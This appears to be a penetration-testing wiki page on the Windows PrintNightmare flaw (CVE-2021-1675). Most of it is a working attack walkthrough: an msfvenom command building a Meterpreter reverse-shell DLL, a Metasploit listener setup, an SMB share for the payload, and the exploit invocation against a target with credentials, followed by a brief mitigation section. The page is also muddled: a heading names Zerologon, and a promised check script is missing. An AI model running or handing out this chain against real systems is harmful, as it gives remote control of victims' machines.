PrintNightmare (CVE-2021-1675)

PrintNightmare (CVE-2021-1675) is a critical vulnerability in the Windows Print Spooler service that allows remote code execution. This vulnerability can be exploited to execute malicious DLLs either remotely or locally on affected machines.

Step-by-Step Process to Check for Zerologon Vulnerability

  1. Check if the Domain is Vulnerable:

    Use the following script to test if your domain is vulnerable to PrintNightmare:

if you saw this output then your target is vulnrable.

  1. Installation :

    Before executing the exploit, ensure you have the correct version of Impacket installed. Follow these steps:

    1. Uninstall the default Impacket version:

      pip3 uninstall impacket

    2. Clone the custom Impacket repository:

      git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

To create a Meterpreter payload that will provide remote shell access, use msfvenom to generate a malicious DLL : 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=5555 -f dll > shell.dll

3. Setting Up the Metasploit Listener

  1. Open Metasploit Framework:

Use the multi/handler exploit:

use exploit/multi/handler

Set the payload:

set payload windows/x64/meterpreter/reverse_tcp

Configure the listener with your IP and port:

set LHOST <your_ip>
set LPORT 5555

Verify the settings:

options

Run the exploit:

run

4. Setting Up File Sharing (SMB)

You need to share the location of your payload (shell.dll) so that it can be accessed by the target machine.

  1. Start an SMB server to share the directory containing shell.dll:

    python3 smbserver.py share <path-to-your-directory> //You may need to use the -smb2support flag if SMBv1 doesn't work.
now we shred the whole currecnt directory

6. Running the PrintNightmare Exploit

Now that everything is set up, execute the PrintNightmare exploit. This is done by running the CVE-2021-1675.py script.

python3 CVE-2021-1675.py <domain>/<any-user>:<password>@<target-ip> '\\<file-share-location>'

7. Post-Exploit: Catch the Meterpreter Session

After executing the exploit, you should see a connection from the target system in Metasploit. Once the payload is triggered, you'll have a Meterpreter session established, allowing you to interact with the compromised system.

Mitigation

Microsoft has released patches for this vulnerability, but the system may still be vulnerable if the following registry values are present:

REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1

To mitigate this vulnerability, ensure these values are set to the correct restrictions or disable the Print Spooler service altogether.

Disable the Spooler Service

You can disable the Spooler service to prevent further exploitation:

Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f

This will stop and disable the Print Spooler service on the target machine.

PreviousZerologon (CVE-2020-1472)NextPost-Compromise Attacks

Last updated